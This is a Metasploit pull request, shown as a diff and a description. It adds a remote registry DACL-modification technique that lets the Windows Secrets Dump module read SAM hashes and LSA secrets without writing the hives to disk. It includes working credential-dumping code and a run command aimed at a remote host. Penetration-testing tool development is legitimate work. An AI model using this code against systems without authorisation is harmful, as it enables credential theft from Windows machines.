### PR TITLE
Windows Secrets Dump: Enable inline credentials dump

### DIFF
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -475,7 +475,7 @@ GEM
     ruby-progressbar (1.13.0)
     ruby-rc4 (0.1.5)
     ruby2_keywords (0.0.5)
-    ruby_smb (3.3.6)
+    ruby_smb (3.3.7)
       bindata (= 2.4.15)
       openssl-ccm
       openssl-cmac

--- a/documentation/modules/auxiliary/gather/windows_secrets_dump.md
+++ b/documentation/modules/auxiliary/gather/windows_secrets_dump.md
@@ -2,10 +2,15 @@
 ### Description
 The `windows_secrets_dump` auxiliary module dumps SAM hashes and LSA secrets
 (including cached creds) from the remote Windows target without executing any
-agent locally. First, it reads as much data as possible from the registry and
-then save the hives locally on the target (`%SYSTEMROOT%\\random.tmp`).
-Finally, it downloads the temporary hive files and reads the rest of the data
-from it. These temporary files are removed when it's done.
+agent locally. This is done by remotely updating the registry key security
+descriptor, taking advantage of the WriteDACL privileges held by local
+administrators to set temporary read permissions.
+
+This can be disabled by setting the `INLINE` option to false and the module
+will fallback to the original implementation, which consists in saving the
+registry hives locally on the target (%SYSTEMROOT%\Temp\<random>.tmp),
+downloading the temporary hive files and reading the data from it. This
+temporary files are removed when it's done.
 
 On domain controllers, secrets from Active Directory is extracted using [MS-DRDS]
 DRSGetNCChanges(), replicating the attributes we need to get SIDs, NTLM hashes,
@@ -43,7 +48,10 @@ Windows XP/Server 2003 to Windows 10/Server version 2004.
 14. Verify the notes are there
 
 ## Options
-Apart from the standard SMB options, no other specific options are needed.
+
+### INLINE
+Use inline technique to read protected keys from the registry remotely without
+saving the hives to disk (default: true).
 
 ## Actions
 

--- a/lib/msf/util/windows_registry.rb
+++ b/lib/msf/util/windows_registry.rb
@@ -1,7 +1,7 @@
 module Msf::Util::WindowsRegistry
 
-  def self.parse(hive_data, name: nil)
-    RegistryParser.new(hive_data, name: name)
+  def self.parse(hive_data, name: nil, root: nil)
+    RegistryParser.new(hive_data, name: name, root: root)
   end
 
 end

--- a/lib/msf/util/windows_registry/registry_parser.rb
+++ b/lib/msf/util/windows_registry/registry_parser.rb
@@ -213,6 +213,8 @@ module WindowsRegistry
       when :security
         require_relative 'security'
         extend Security
+      else
+        wlog("[Msf::Util::WindowsRegistry::RegistryParser] Unknown :name argument: #{name}") unless name.blank?
       end
     end
 

--- a/lib/msf/util/windows_registry/registry_parser.rb
+++ b/lib/msf/util/windows_registry/registry_parser.rb
@@ -198,11 +198,14 @@ module WindowsRegistry
 
     # @param hive_data [String] The binary registry data
     # @param name [Symbol] The key name to add specific helpers. Only `:sam`
+    # @param root [String] The root key and subkey corresponding to the hive_data
     #   and `:security` are supported at the moment.
-    def initialize(hive_data, name: nil)
+    def initialize(hive_data, name: nil, root: nil)
       @hive_data = hive_data.b
       @regf = RegRegf.read(@hive_data)
-      @root_key = find_root_key
+      @root_key_block = find_root_key
+      @root = root
+      @root << '\\' unless root.end_with?('\\')
       case name
       when :sam
         require_relative 'sam'
@@ -224,10 +227,10 @@ module WindowsRegistry
       @hive_data.unpack('a4096' * (@hive_data.size / 4096)).each do |data|
         next unless data[0,4] == 'hbin'
         reg_hbin = RegHbin.read(data)
-        root_key = reg_hbin.reg_hbin_blocks.find do |block|
+        root_key_block = reg_hbin.reg_hbin_blocks.find do |block|
           block.data.respond_to?(:magic) && block.data.magic == NK_MAGIC && block.data.nk_type == ROOT_KEY
         end
-        return root_key if root_key
+        return root_key_block if root_key_block
       rescue IOError
         raise StandardError, 'Cannot parse the RegHbin structure'
       end
@@ -265,7 +268,7 @@ module WindowsRegistry
       # only asking for the root node
       key = key[1..-1] if key[0] == '\\' && key.size > 1
 
-      parent_key = @root_key
+      parent_key = @root_key_block
       if key.size > 0 && key[0] != '\\'
         key.split('\\').each do |sub_key|
           res = find_sub_key(parent_key, sub_key)
@@ -450,11 +453,11 @@ module WindowsRegistry
       res = []
       value_list = get_value_blocks(key_obj.data.offset_value_list, key_obj.data.num_values + 1)
       value_list.each do |value|
+        # TODO: use #to_s to make sure value.data.name is a String
         res << (value.data.flag > 0 ? value.data.name : nil)
       end
       res
     end
-
   end
 
 end

--- a/lib/msf/util/windows_registry/remote_registry.rb
+++ b/lib/msf/util/windows_registry/remote_registry.rb
@@ -1,0 +1,167 @@
+module Msf
+module Util
+module WindowsRegistry
+
+  class RemoteRegistry
+    # Constants
+    ROOT_KEY        = 0x2c
+    REG_NONE        = 0x00
+    REG_SZ          = 0x01
+    REG_EXPAND_SZ   = 0x02
+    REG_BINARY      = 0x03
+    REG_DWORD       = 0x04
+    REG_MULTISZ     = 0x07
+    REG_QWORD       = 0x0b
+
+    LOCAL_GROUP_ADMINS_SID = 'S-1-5-32-544'
+
+    def initialize(winreg, name: nil, inline: false)
+      @winreg = winreg
+      @inline = inline
+      case name
+      when :sam
+        require_relative 'sam'
+        extend Sam
+      when :security
+        require_relative 'security'
+        extend Security
+      end
+    end
+
+    def create_ace(sid)
+      access_mask = RubySMB::Dcerpc::Winreg::Regsam.new({
+        write_dac: 1,
+        read_control: 1,
+        key_enumerate_sub_keys: 1,
+        key_query_value: 1
+      })
+      Rex::Proto::MsDtyp::MsDtypAce.new({
+        header: {
+          ace_type: Rex::Proto::MsDtyp::MsDtypAceType::ACCESS_ALLOWED_ACE_TYPE,
+          ace_flags: { container_inherit_ace: 1 }
+        },
+        body: {
+          access_mask: Rex::Proto::MsDtyp::MsDtypAccessMask.read(access_mask.to_binary_s),
+          sid: sid
+        }
+      })
+    end
+
+    def backup_file_path
+      return @backup_file_path if @backup_file_path
+
+      if ! File.directory?(Msf::Config.local_directory)
+        FileUtils.mkdir_p(Msf::Config.local_directory)
+      end
+      remote_host = @winreg.tree.client.dns_host_name
+      remote_host = @winreg.tree.client.dispatcher.tcp_socket.peerhost if remote_host.blank?
+      path = File.join(Msf::Config.local_directory, "remote_registry_sd_backup_#{remote_host}_#{Time.now.strftime("%Y%m%d%H%M%S")}.#{Rex::Text.rand_text_alpha(6)}.yml")
+      @backup_file_path = File.expand_path(path)
+    end
+
+    def save_to_file(key, security_descriptor, security_information, path = backup_file_path)
+      sd_info = {
+        'key' => key,
+        'security_info' => security_information,
+        'sd' => security_descriptor.b.bytes.map { |c| '%02x' % c.ord }.join
+      }
+      File.open(path, 'w') do |fd|
+        fd.write(sd_info.to_yaml)
+      end
+    end
+
+    def read_from_file(filepath)
+      sd_info = YAML.safe_load_file(filepath)
+      sd_info['security_info'] = sd_info['security_info'].to_i
+      sd_info
+    end
+
+    def delete_backup_file(path = backup_file_path)
+      File.delete(path) if File.file?(path)
+    end
+
+    def change_dacl(key, sid)
+      security_information =
+        RubySMB::Field::SecurityDescriptor::OWNER_SECURITY_INFORMATION |
+        RubySMB::Field::SecurityDescriptor::GROUP_SECURITY_INFORMATION |
+        RubySMB::Field::SecurityDescriptor::DACL_SECURITY_INFORMATION
+
+      security_descriptor = @winreg.get_key_security_descriptor(key, security_information, bind: false)
+      dlog("Security descriptor for #{key}: #{security_descriptor.b.bytes.map { |c| '%02x' % c.ord }.join}")
+      save_to_file(key, security_descriptor, RubySMB::Field::SecurityDescriptor::DACL_SECURITY_INFORMATION)
+
+      parsed_sd = Rex::Proto::MsDtyp::MsDtypSecurityDescriptor.read(security_descriptor)
+      ace = create_ace(sid)
+      parsed_sd.dacl.aces << ace
+      parsed_sd.dacl.acl_count += 1
+      parsed_sd.dacl.acl_size += ace.num_bytes
+      dlog("New security descriptor for #{key}: #{parsed_sd.to_binary_s.b.bytes.map { |c| '%02x' % c.ord }.join}")
+
+      @winreg.set_key_security_descriptor(key, parsed_sd.to_binary_s, RubySMB::Field::SecurityDescriptor::DACL_SECURITY_INFORMATION, bind: false)
+
+      security_descriptor.dup
+    rescue RubySMB::Dcerpc::Error::WinregError => e
+      elog("Error while changing DACL on key `#{key}`: #{e}")
+    end
+
+    def restore_dacl(key, security_descriptor)
+      begin
+        dlog("Restoring DACL on key `#{key}`")
+        @winreg.set_key_security_descriptor(key, security_descriptor, RubySMB::Field::SecurityDescriptor::DACL_SECURITY_INFORMATION, bind: false)
+      rescue StandardError => e
+        elog(
+          "Error while restoring DACL on key `#{key}`: #{e}\n"\
+          "The original security descriptor has been saved in `#{backup_file_path}`. "\
+          "The auxiliary module `admin/registry_security_descriptor` can be used to "\
+          "restore the security descriptor from this file."
+        )
+        # Reset the `backup_file_path` instance variable to make sure a new
+        # backup filename will be generated. This way, this backup file won't
+        # be deleted the next time `#restore_dacl` is called.
+        @backup_file_path = nil
+        return
+      end
+      delete_backup_file
+    end
+
+    def enum_values(key)
+      sd_backup = change_dacl(key, LOCAL_GROUP_ADMINS_SID) if @inline
+      @winreg.enum_registry_values(key, bind: false).map do |value|
+        value.to_s.encode(::Encoding::ASCII_8BIT)
+      end
+    ensure
+      restore_dacl(key, sd_backup) if @inline
+    end
+
+    def enum_key(key)
+      sd_backup = change_dacl(key, LOCAL_GROUP_ADMINS_SID) if @inline
+      @winreg.enum_registry_key(key, bind: false).map do |key|
+        key.to_s.encode(::Encoding::ASCII_8BIT)
+      end
+    ensure
+      restore_dacl(key, sd_backup) if @inline
+    end
+
+    def get_value(key, value_name = nil)
+      sd_backup = change_dacl(key, LOCAL_GROUP_ADMINS_SID) if @inline
+      root_key, sub_key = key.gsub(/\//, '\\').split('\\', 2)
+      root_key_handle = @winreg.open_root_key(root_key)
+      subkey_handle = @winreg.open_key(root_key_handle, sub_key)
+      begin
+        type, value = @winreg.query_value(subkey_handle, value_name.nil? ? '' : value_name, type: true)
+        [type.to_i, value.to_s.b]
+      rescue RubySMB::Dcerpc::Error::WinregError
+        nil
+      end
+    ensure
+      @winreg.close_key(subkey_handle) if subkey_handle
+      @winreg.close_key(root_key_handle) if root_key_handle
+      restore_dacl(key, sd_backup) if @inline
+    end
+
+  end
+end
+end
+end
+
+

--- a/lib/msf/util/windows_registry/remote_registry.rb
+++ b/lib/msf/util/windows_registry/remote_registry.rb
@@ -13,8 +13,6 @@ module WindowsRegistry
     REG_MULTISZ     = 0x07
     REG_QWORD       = 0x0b
 
-    LOCAL_GROUP_ADMINS_SID = 'S-1-5-32-544'
-
     def initialize(winreg, name: nil, inline: false)
       @winreg = winreg
       @inline = inline
@@ -25,6 +23,8 @@ module WindowsRegistry
       when :security
         require_relative 'security'
         extend Security
+      else
+        wlog("[Msf::Util::WindowsRegistry::RemoteRegistry] Unknown :name argument: #{name}") unless name.blank?
       end
     end
 
@@ -87,7 +87,7 @@ module WindowsRegistry
         RubySMB::Field::SecurityDescriptor::DACL_SECURITY_INFORMATION
 
       security_descriptor = @winreg.get_key_security_descriptor(key, security_information, bind: false)
-      dlog("Security descriptor for #{key}: #{security_descriptor.b.bytes.map { |c| '%02x' % c.ord }.join}")
+      dlog("[Msf::Util::WindowsRegistry::RemoteRegistry] Security descriptor for #{key}: #{security_descriptor.b.bytes.map { |c| '%02x' % c.ord }.join}")
       save_to_file(key, security_descriptor, RubySMB::Field::SecurityDescriptor::DACL_SECURITY_INFORMATION)
 
       parsed_sd = Rex::Proto::MsDtyp::MsDtypSecurityDescriptor.read(security_descriptor)
@@ -95,22 +95,22 @@ module WindowsRegistry
       parsed_sd.dacl.aces << ace
       parsed_sd.dacl.acl_count += 1
       parsed_sd.dacl.acl_size += ace.num_bytes
-      dlog("New security descriptor for #{key}: #{parsed_sd.to_binary_s.b.bytes.map { |c| '%02x' % c.ord }.join}")
+      dlog("[Msf::Util::WindowsRegistry::RemoteRegistry] New security descriptor for #{key}: #{parsed_sd.to_binary_s.b.bytes.map { |c| '%02x' % c.ord }.join}")
 
       @winreg.set_key_security_descriptor(key, parsed_sd.to_binary_s, RubySMB::Field::SecurityDescriptor::DACL_SECURITY_INFORMATION, bind: false)
 
-      security_descriptor.dup
+      security_descriptor
     rescue RubySMB::Dcerpc::Error::WinregError => e
-      elog("Error while changing DACL on key `#{key}`: #{e}")
+      elog("[Msf::Util::WindowsRegistry::RemoteRegistry] Error while changing DACL on key `#{key}`: #{e}")
     end
 
     def restore_dacl(key, security_descriptor)
       begin
-        dlog("Restoring DACL on key `#{key}`")
+        dlog("[Msf::Util::WindowsRegistry::RemoteRegistry] Restoring DACL on key `#{key}`")
         @winreg.set_key_security_descriptor(key, security_descriptor, RubySMB::Field::SecurityDescriptor::DACL_SECURITY_INFORMATION, bind: false)
       rescue StandardError => e
         elog(
-          "Error while restoring DACL on key `#{key}`: #{e}\n"\
+          "[Msf::Util::WindowsRegistry::RemoteRegistry] Error while restoring DACL on key `#{key}`: #{e}\n"\
           "The original security descriptor has been saved in `#{backup_file_path}`. "\
           "The auxiliary module `admin/registry_security_descriptor` can be used to "\
           "restore the security descriptor from this file."
@@ -125,38 +125,38 @@ module WindowsRegistry
     end
 
     def enum_values(key)
-      sd_backup = change_dacl(key, LOCAL_GROUP_ADMINS_SID) if @inline
+      sd_backup = change_dacl(key, Rex::Proto::Secauthz::WellKnownSids::DOMAIN_ALIAS_SID_ADMINS) if @inline
       @winreg.enum_registry_values(key, bind: false).map do |value|
         value.to_s.encode(::Encoding::ASCII_8BIT)
       end
     ensure
-      restore_dacl(key, sd_backup) if @inline
+      restore_dacl(key, sd_backup) if @inline && sd_backup
     end
 
     def enum_key(key)
-      sd_backup = change_dacl(key, LOCAL_GROUP_ADMINS_SID) if @inline
+      sd_backup = change_dacl(key, Rex::Proto::Secauthz::WellKnownSids::DOMAIN_ALIAS_SID_ADMINS) if @inline
       @winreg.enum_registry_key(key, bind: false).map do |key|
         key.to_s.encode(::Encoding::ASCII_8BIT)
       end
     ensure
-      restore_dacl(key, sd_backup) if @inline
+      restore_dacl(key, sd_backup) if @inline && sd_backup
     end
 
     def get_value(key, value_name = nil)
-      sd_backup = change_dacl(key, LOCAL_GROUP_ADMINS_SID) if @inline
+      sd_backup = change_dacl(key, Rex::Proto::Secauthz::WellKnownSids::DOMAIN_ALIAS_SID_ADMINS) if @inline
       root_key, sub_key = key.gsub(/\//, '\\').split('\\', 2)
       root_key_handle = @winreg.open_root_key(root_key)
       subkey_handle = @winreg.open_key(root_key_handle, sub_key)
       begin
-        type, value = @winreg.query_value(subkey_handle, value_name.nil? ? '' : value_name, type: true)
-        [type.to_i, value.to_s.b]
+        reg_value = @winreg.query_value(subkey_handle, value_name.nil? ? '' : value_name)
+        [reg_value.type.to_i, reg_value.data.to_s.b]
       rescue RubySMB::Dcerpc::Error::WinregError
         nil
       end
     ensure
       @winreg.close_key(subkey_handle) if subkey_handle
       @winreg.close_key(root_key_handle) if root_key_handle
-      restore_dacl(key, sd_backup) if @inline
+      restore_dacl(key, sd_backup) if @inline && sd_backup
     end
 
   end

--- a/modules/auxiliary/gather/windows_secrets_dump.rb
+++ b/modules/auxiliary/gather/windows_secrets_dump.rb
@@ -860,7 +860,8 @@ class MetasploitModule < Msf::Auxiliary
     dc_infos = dcerpc_client.drs_domain_controller_info(ph_drs, domain_name)
     user_info = {}
     dc_infos.each do |dc_info|
-      users.each_key do |sid|
+      users.each do |user|
+        sid = user[0]
         crack_names = dcerpc_client.drs_crack_names(ph_drs, rp_names: [sid])
         crack_names.each do |crack_name|
           user_record = dcerpc_client.drs_get_nc_changes(

--- a/modules/auxiliary/gather/windows_secrets_dump.rb
+++ b/modules/auxiliary/gather/windows_secrets_dump.rb
@@ -33,11 +33,17 @@ class MetasploitModule < Msf::Auxiliary
         'Name' => 'Windows Secrets Dump',
         'Description' => %q{
           Dumps SAM hashes and LSA secrets (including cached creds) from the
-          remote Windows target without executing any agent locally. First, it
-          reads as much data as possible from the registry and then save the
-          hives locally on the target (%SYSTEMROOT%\Temp\random.tmp). Finally, it
-          downloads the temporary hive files and reads the rest of the data
-          from it. This temporary files are removed when it's done.
+          remote Windows target without executing any agent locally. This is
+          done by remotely updating the registry key security descriptor,
+          taking advantage of the WriteDACL privileges held by local
+          administrators to set temporary read permissions.
+
+          This can be disabled by setting the `INLINE` option to false and the
+          module will fallback to the original implementation, which consists
+          in saving the registry hives locally on the target
+          (%SYSTEMROOT%\Temp\<random>.tmp), downloading the temporary hive
+          files and reading the data from it. This temporary files are removed
+          when it's done.
 
           On domain controllers, secrets from Active Directory is extracted
           using [MS-DRDS] DRSGetNCChanges(), replicating the attributes we need
@@ -57,6 +63,7 @@ class MetasploitModule < Msf::Auxiliary
         'Author' => [
           'Alberto Solino', # Original Impacket code
           'Christophe De La Fuente', # MSF module
+          'antuache' # Inline technique
         ],
         'References' => [
           ['URL', 'https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py'],


### PR DESCRIPTION
This improves the Windows Secrets Dump module by retrieving the credentials without touching the disk. This is based on this Impacket [PR](https://github.com/fortra/impacket/pull/1698).

This technique takes advantage of the `WriteDACL` privileges held by local administrators to set temporary read permissions on the `SAM` and `SECURITY` registry hives. With this, it is not necessary to write these hives to disk and parse them, like it was with the original implementation.

This technique is enabled by default and can be disable by setting the `INLINE` option to `false`.

The logic has been delegated to a new class `Msf::Util::WindowsRegistry::RemoteRegistry`, which takes care of setting the registry key security descriptor (DACL) to give enough permission to read it. It also takes care of restoring the original security descriptor immediately after the read operation. It also takes care of backing it up to a local file in case the restoring operation fails for some reason. The user will be able to restore it manually using a separate module, which will be added soon.

:warning: **Important** :warning:
These changes need this RubySMB related [PR](https://github.com/rapid7/ruby_smb/pull/265) to be landed to work.

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use auxiliary/gather/windows_secrets_dump`
- [x] `run rhost=<remote host> smbuser=<username> smbpass=<user's password> verbose=true`
- [x] **Verify** the security descriptor is correctly set on the registry keys
- [x] **Verify** the SAM and SECURITY hives are read correctly and the module retrieves the credentials the same way it does without this technique
- [x] **Verify** the original unmodified security descriptor are correctly restored on the registry keys. This can be observed in the MSF logs.
- [x] Re-run the module with `inline=false`
- [x] **Verify** the results are the same as with the inline technique enabled

